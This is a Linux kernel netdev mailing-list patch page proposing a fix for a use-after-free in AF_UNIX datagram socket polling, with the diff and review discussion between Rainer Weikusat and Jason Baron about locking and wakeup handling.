diff mbox

unix: avoid use-after-free in ep_remove_wait_queue

Message ID 87a8qhspfm.fsf@doppelsaurus.mobileactivedefense.com
State Changes Requested, archived
Delegated to: David Miller
Headers show

Commit Message

Rainer Weikusat Nov. 13, 2015, 6:51 p.m. UTC
An AF_UNIX datagram socket being the client in an n:1 association with
some server socket is only allowed to send messages to the server if the
receive queue of this socket contains at most sk_max_ack_backlog
datagrams. This implies that prospective writers might be forced to go
to sleep despite none of the message presently enqueued on the server
receive queue were sent by them. In order to ensure that these will be
woken up once space becomes again available, the present unix_dgram_poll
routine does a second sock_poll_wait call with the peer_wait wait queue
of the server socket as queue argument (unix_dgram_recvmsg does a wake
up on this queue after a datagram was received). This is inherently
problematic because the server socket is only guaranteed to remain alive
for as long as the client still holds a reference to it. In case the
connection is dissolved via connect or by the dead peer detection logic
in unix_dgram_sendmsg, the server socket may be freed despite "the
polling mechanism" (in particular, epoll) still has a pointer to the
corresponding peer_wait queue. There's no way to forcibly deregister a
wait queue with epoll.

Based on an idea by Jason Baron, the patch below changes the code such
that a wait_queue_t belonging to the client socket is enqueued on the
peer_wait queue of the server whenever the peer receive queue full
condition is detected by either a sendmsg or a poll. A wake up on the
peer queue is then relayed to the ordinary wait queue of the client
socket via wake function. The connection to the peer wait queue is again
dissolved if either a wake up is about to be relayed or the client
socket reconnects or a dead peer is detected or the client socket is
itself closed. This enables removing the second sock_poll_wait from
unix_dgram_poll, thus avoiding the use-after-free, while still ensuring
that no blocked writer sleeps forever.

Signed-off-by: Rainer Weikusat <rweikusat@mobileactivedefense.com>
---
"Believed to be least buggy version"

	- disconnect from former peer in _dgram_connect

        - use unix_state_double_lock in _dgram_sendmsg to ensure
          recv_ready/ wake_me preconditions are met (noted by Jason
          Baron)

--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html

Comments

Jason Baron Nov. 13, 2015, 10:17 p.m. UTC | #1
On 11/13/2015 01:51 PM, Rainer Weikusat wrote:

[...]

>  
> -	if (unix_peer(other) != sk && unix_recvq_full(other)) {
> -		if (!timeo) {
> -			err = -EAGAIN;
> -			goto out_unlock;
> -		}
> +	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {

Remind me why the 'unix_peer(sk) == other' is added here? If the remote
is not connected we still want to make sure that we don't overflow the
the remote rcv queue, right?

In terms of this added 'double' lock for both sk and other, where
previously we just held the 'other' lock. I think we could continue to
just hold the 'other' lock unless the remote queue is full, so something
like:

        if (unix_peer(other) != sk && unix_recvq_full(other)) {
                bool need_wakeup = false;

		....skipping the blocking case...

                err = -EAGAIN;
                if (!other_connected)
                        goto out_unlock;
                unix_state_unlock(other);
                unix_state_lock(sk);

		/* if remote peer has changed under us, the connect()
                   will wake up any pending waiter, just return -EAGAIN

                if (unix_peer(sk) == other) {
			/* In case we see there is space available
			   queue the wakeup and we will try again. This
			   this should be an unlikely condition */
	 		if (!unix_dgram_peer_wake_me(sk, other))
                                need_wakeup = true;
                }
                unix_state_unlock(sk);
                if (need_wakeup)
                        wake_up_interruptible_poll(sk_sleep(sk),POLLOUT
| POLLWRNORM | POLLWRBAND);
                goto out_free;
        }

So I'm not sure if the 'double' lock really affects any workload, but
the above might be away to avoid it.

Also - it might be helpful to add a 'Fixes:' tag referencing where this
issue started, in the changelog.

Worth mentioning too is that this patch should improve the polling case
here dramatically, as we currently wake the entire queue on every remote
read even when we have room in the rcv buffer. So this patch will cut
down on ctxt switching rate dramatically from what we currently have.

Thanks,

-Jason
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Rainer Weikusat Nov. 15, 2015, 6:32 p.m. UTC | #2
Jason Baron <jbaron@akamai.com> writes:
> On 11/13/2015 01:51 PM, Rainer Weikusat wrote:
>
> [...]
>
>>  
>> -	if (unix_peer(other) != sk && unix_recvq_full(other)) {
>> -		if (!timeo) {
>> -			err = -EAGAIN;
>> -			goto out_unlock;
>> -		}
>> +	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {
>
> Remind me why the 'unix_peer(sk) == other' is added here? If the remote
> is not connected we still want to make sure that we don't overflow the
> the remote rcv queue, right?

Good point. The check is actually wrong there as the original code would
also check the limit in case of an unconnected send to a socket found
via address lookup. It belongs into the 2nd if (were I originally put
it).

>
> In terms of this added 'double' lock for both sk and other, where
> previously we just held the 'other' lock. I think we could continue to
> just hold the 'other' lock unless the remote queue is full, so something
> like:
>
>         if (unix_peer(other) != sk && unix_recvq_full(other)) {
>                 bool need_wakeup = false;
>
> 		....skipping the blocking case...
>
>                 err = -EAGAIN;
>                 if (!other_connected)
>                         goto out_unlock;
>                 unix_state_unlock(other);
>                 unix_state_lock(sk);

That was my original idea. The problem with this is that the code
starting after the _lock and running until the main code path unlock has
to be executed in one go with the other lock held as the results of the
tests above this one may become invalid as soon as the other lock is
released. This means instead of continuing execution with the send code
proper after the block in case other became receive-ready between the
first and the second test (possible because _dgram_recvmsg does not
take the unix state lock), the whole procedure starting with acquiring
the other lock would need to be restarted. Given sufficiently unfavorable
circumstances, this could even turn into an endless loop which couldn't
be interrupted. (unless code for this was added). 

[...]

> we currently wake the entire queue on every remote read even when we
> have room in the rcv buffer. So this patch will cut down on ctxt
> switching rate dramatically from what we currently have.

In my opinion, this could be improved by making the throttling mechanism
work like a flip flop: If the queue lenght hits the limit after a
_sendmsg, set a "no more applicants" flag blocking future sends until
cleared (checking the flag would replace the present
check). After the receive queue ran empty (or almost empty),
_dgram_sendmsg would clear the flag and do a wakeup. But this should be
an independent patch (if implemented).
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Jason Baron Nov. 17, 2015, 4:08 p.m. UTC | #3
On 11/15/2015 01:32 PM, Rainer Weikusat wrote:

> 
> That was my original idea. The problem with this is that the code
> starting after the _lock and running until the main code path unlock has
> to be executed in one go with the other lock held as the results of the
> tests above this one may become invalid as soon as the other lock is
> released. This means instead of continuing execution with the send code
> proper after the block in case other became receive-ready between the
> first and the second test (possible because _dgram_recvmsg does not
> take the unix state lock), the whole procedure starting with acquiring
> the other lock would need to be restarted. Given sufficiently unfavorable
> circumstances, this could even turn into an endless loop which couldn't
> be interrupted. (unless code for this was added). 
> 

hmmm - I think we can avoid it by doing the wakeup from the write path
in the rare case that the queue has emptied - and avoid the double lock. IE:

                unix_state_unlock(other);
                unix_state_lock(sk);
                err = -EAGAIN;
                if (unix_peer(sk) == other) {
                       unix_dgram_peer_wake_connect(sk, other);
                       if (skb_queue_len(&other->sk_receive_queue) == 0)
                               need_wakeup = true;
                }
                unix_state_unlock(sk);
                if (need_wakeup)
                        wake_up_interruptible_poll(sk_sleep(sk), POLLOUT
| POLLWRNORM | POLLWRBAND);
                goto out_free;


Thanks,

-Jason
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
Rainer Weikusat Nov. 17, 2015, 6:38 p.m. UTC | #4
Jason Baron <jbaron@akamai.com> writes:
> On 11/15/2015 01:32 PM, Rainer Weikusat wrote:
>
>> 
>> That was my original idea. The problem with this is that the code
>> starting after the _lock and running until the main code path unlock has
>> to be executed in one go with the other lock held as the results of the
>> tests above this one may become invalid as soon as the other lock is
>> released. This means instead of continuing execution with the send code
>> proper after the block in case other became receive-ready between the
>> first and the second test (possible because _dgram_recvmsg does not
>> take the unix state lock), the whole procedure starting with acquiring
>> the other lock would need to be restarted. Given sufficiently unfavorable
>> circumstances, this could even turn into an endless loop which couldn't
>> be interrupted. (unless code for this was added). 
>> 
>
> hmmm - I think we can avoid it by doing the wakeup from the write path
> in the rare case that the queue has emptied - and avoid the double lock. IE:
>
>                 unix_state_unlock(other);
>                 unix_state_lock(sk);
>                 err = -EAGAIN;
>                 if (unix_peer(sk) == other) {
>                        unix_dgram_peer_wake_connect(sk, other);
>                        if (skb_queue_len(&other->sk_receive_queue) == 0)
>                                need_wakeup = true;
>                 }
>                 unix_state_unlock(sk);
>                 if (need_wakeup)
>                         wake_up_interruptible_poll(sk_sleep(sk), POLLOUT
> | POLLWRNORM | POLLWRBAND);
>                 goto out_free;

This should probably rather be

if (unix_dgram_peer_wake_connect(sk, other) &&
    skb_queue_len(&other->sk_receive_queue) == 0)
	need_wakeup = 1;

as there's no need to do the wake up if someone else already connected
and then, the double lock could be avoided at the expense of returning a
gratuitous EAGAIN to the caller and throwing all of the work
_dgram_sendmsg did so far, eg, allocate a skb, copy the data into the
kernel, do all the other checks, away.

This would enable another thread to do one of the following things in
parallell with the 'locked' part of _dgram_sendmsg

	1) connect sk to a socket != other
        2) use sk to send to a socket != other
        3) do a shutdown on sk
        4) determine write-readyness of sk via poll callback

IMHO, the only thing which could possibly matter is 2) and my suggestion
for this would rather be "use a send socket per sending thread if this
matters to you" than "cause something to fail which could as well
have succeeded".
--
To unsubscribe from this list: send the line "unsubscribe netdev" in
the body of a message to majordomo@vger.kernel.org
More majordomo info at  http://vger.kernel.org/majordomo-info.html
diff mbox

Patch

diff --git a/include/net/af_unix.h b/include/net/af_unix.h
index b36d837..2a91a05 100644
--- a/include/net/af_unix.h
+++ b/include/net/af_unix.h
@@ -62,6 +62,7 @@  struct unix_sock {
 #define UNIX_GC_CANDIDATE	0
 #define UNIX_GC_MAYBE_CYCLE	1
 	struct socket_wq	peer_wq;
+	wait_queue_t		peer_wake;
 };
 
 static inline struct unix_sock *unix_sk(const struct sock *sk)
diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
index 94f6582..30e7c56 100644
--- a/net/unix/af_unix.c
+++ b/net/unix/af_unix.c
@@ -326,6 +326,122 @@  found:
 	return s;
 }
 
+/* Support code for asymmetrically connected dgram sockets
+ *
+ * If a datagram socket is connected to a socket not itself connected
+ * to the first socket (eg, /dev/log), clients may only enqueue more
+ * messages if the present receive queue of the server socket is not
+ * "too large". This means there's a second writeability condition
+ * poll and sendmsg need to test. The dgram recv code will do a wake
+ * up on the peer_wait wait queue of a socket upon reception of a
+ * datagram which needs to be propagated to sleeping would-be writers
+ * since these might not have sent anything so far. This can't be
+ * accomplished via poll_wait because the lifetime of the server
+ * socket might be less than that of its clients if these break their
+ * association with it or if the server socket is closed while clients
+ * are still connected to it and there's no way to inform "a polling
+ * implementation" that it should let go of a certain wait queue
+ *
+ * In order to propagate a wake up, a wait_queue_t of the client
+ * socket is enqueued on the peer_wait queue of the server socket
+ * whose wake function does a wake_up on the ordinary client socket
+ * wait queue. This connection is established whenever a write (or
+ * poll for write) hit the flow control condition and broken when the
+ * association to the server socket is dissolved or after a wake up
+ * was relayed.
+ */
+
+static int unix_dgram_peer_wake_relay(wait_queue_t *q, unsigned mode, int flags,
+				      void *key)
+{
+	struct unix_sock *u;
+	wait_queue_head_t *u_sleep;
+
+	u = container_of(q, struct unix_sock, peer_wake);
+
+	__remove_wait_queue(&unix_sk(u->peer_wake.private)->peer_wait,
+			    q);
+	u->peer_wake.private = NULL;
+
+	/* relaying can only happen while the wq still exists */
+	u_sleep = sk_sleep(&u->sk);
+	if (u_sleep)
+		wake_up_interruptible_poll(u_sleep, key);
+
+	return 0;
+}
+
+static int unix_dgram_peer_wake_connect(struct sock *sk, struct sock *other)
+{
+	struct unix_sock *u, *u_other;
+	int rc;
+
+	u = unix_sk(sk);
+	u_other = unix_sk(other);
+	rc = 0;
+
+	spin_lock(&u_other->peer_wait.lock);
+
+	if (!u->peer_wake.private) {
+		u->peer_wake.private = other;
+		__add_wait_queue(&u_other->peer_wait, &u->peer_wake);
+
+		rc = 1;
+	}
+
+	spin_unlock(&u_other->peer_wait.lock);
+	return rc;
+}
+
+static int unix_dgram_peer_wake_disconnect(struct sock *sk, struct sock *other)
+{
+	struct unix_sock *u, *u_other;
+	int rc;
+
+	u = unix_sk(sk);
+	u_other = unix_sk(other);
+	rc = 0;
+
+	spin_lock(&u_other->peer_wait.lock);
+
+	if (u->peer_wake.private == other) {
+		__remove_wait_queue(&u_other->peer_wait, &u->peer_wake);
+		u->peer_wake.private = NULL;
+
+		rc = 1;
+	}
+
+	spin_unlock(&u_other->peer_wait.lock);
+	return rc;
+}
+
+/* Preconditions for the following two functions:
+ *
+ *	- unix_peer(sk) == other
+ *	- association is stable
+ */
+
+static int unix_dgram_peer_recv_ready(struct sock *sk,
+				      struct sock *other)
+{
+	return unix_peer(other) == sk || !unix_recvq_full(other);
+}
+
+static int unix_dgram_peer_wake_me(struct sock *sk, struct sock *other)
+{
+	int connected;
+
+	connected = unix_dgram_peer_wake_connect(sk, other);
+
+	if (unix_recvq_full(other))
+		return 1;
+
+	if (connected)
+		unix_dgram_peer_wake_disconnect(sk, other);
+
+	return 0;
+}
+
 static inline int unix_writable(struct sock *sk)
 {
 	return (atomic_read(&sk->sk_wmem_alloc) << 2) <= sk->sk_sndbuf;
@@ -430,6 +546,8 @@  static void unix_release_sock(struct sock *sk, int embrion)
 			skpair->sk_state_change(skpair);
 			sk_wake_async(skpair, SOCK_WAKE_WAITD, POLL_HUP);
 		}
+
+		unix_dgram_peer_wake_disconnect(sk, skpair);
 		sock_put(skpair); /* It may now die */
 		unix_peer(sk) = NULL;
 	}
@@ -664,6 +782,7 @@  static struct sock *unix_create1(struct net *net, struct socket *sock, int kern)
 	INIT_LIST_HEAD(&u->link);
 	mutex_init(&u->readlock); /* single task reading lock */
 	init_waitqueue_head(&u->peer_wait);
+	init_waitqueue_func_entry(&u->peer_wake, unix_dgram_peer_wake_relay);
 	unix_insert_socket(unix_sockets_unbound(sk), sk);
 out:
 	if (sk == NULL)
@@ -1031,6 +1150,13 @@  restart:
 	if (unix_peer(sk)) {
 		struct sock *old_peer = unix_peer(sk);
 		unix_peer(sk) = other;
+
+		if (unix_dgram_peer_wake_disconnect(sk, old_peer))
+			wake_up_interruptible_poll(sk_sleep(sk),
+						   POLLOUT |
+						   POLLWRNORM |
+						   POLLWRBAND);
+
 		unix_state_double_unlock(sk, other);
 
 		if (other != old_peer)
@@ -1548,7 +1674,7 @@  restart:
 		goto out_free;
 	}
 
-	unix_state_lock(other);
+	unix_state_double_lock(sk, other);
 	err = -EPERM;
 	if (!unix_may_send(sk, other))
 		goto out_unlock;
@@ -1562,9 +1688,15 @@  restart:
 		sock_put(other);
 
 		err = 0;
-		unix_state_lock(sk);
 		if (unix_peer(sk) == other) {
 			unix_peer(sk) = NULL;
+
+			if (unix_dgram_peer_wake_disconnect(sk, other))
+				wake_up_interruptible_poll(sk_sleep(sk),
+							   POLLOUT |
+							   POLLWRNORM |
+							   POLLWRBAND);
+
 			unix_state_unlock(sk);
 
 			unix_dgram_disconnected(sk, other);
@@ -1590,21 +1722,27 @@  restart:
 			goto out_unlock;
 	}
 
-	if (unix_peer(other) != sk && unix_recvq_full(other)) {
-		if (!timeo) {
-			err = -EAGAIN;
-			goto out_unlock;
-		}
+	if (unix_peer(sk) == other && !unix_dgram_peer_recv_ready(sk, other)) {
+		if (timeo) {
+			unix_state_unlock(sk);
 
-		timeo = unix_wait_for_peer(other, timeo);
+			timeo = unix_wait_for_peer(other, timeo);
 
-		err = sock_intr_errno(timeo);
-		if (signal_pending(current))
-			goto out_free;
+			err = sock_intr_errno(timeo);
+			if (signal_pending(current))
+				goto out_free;
 
-		goto restart;
+			goto restart;
+		}
+
+		if (unix_dgram_peer_wake_me(sk, other)) {
+			err = -EAGAIN;
+			goto out_unlock;
+		}
 	}
 
+	unix_state_unlock(sk);
+
 	if (sock_flag(other, SOCK_RCVTSTAMP))
 		__net_timestamp(skb);
 	maybe_add_creds(skb, sock, other);
@@ -1618,7 +1756,7 @@  restart:
 	return len;
 
 out_unlock:
-	unix_state_unlock(other);
+	unix_state_double_unlock(sk, other);
 out_free:
 	kfree_skb(skb);
 out:
@@ -2453,14 +2591,16 @@  static unsigned int unix_dgram_poll(struct file *file, struct socket *sock,
 		return mask;
 
 	writable = unix_writable(sk);
-	other = unix_peer_get(sk);
-	if (other) {
-		if (unix_peer(other) != sk) {
-			sock_poll_wait(file, &unix_sk(other)->peer_wait, wait);
-			if (unix_recvq_full(other))
-				writable = 0;
-		}
-		sock_put(other);
+	if (writable) {
+		unix_state_lock(sk);
+
+		other = unix_peer(sk);
+		if (other &&
+		    !unix_dgram_peer_recv_ready(sk, other) &&
+		    unix_dgram_peer_wake_me(sk, other))
+			writable = 0;
+
+		unix_state_unlock(sk);
 	}
 
 	if (writable)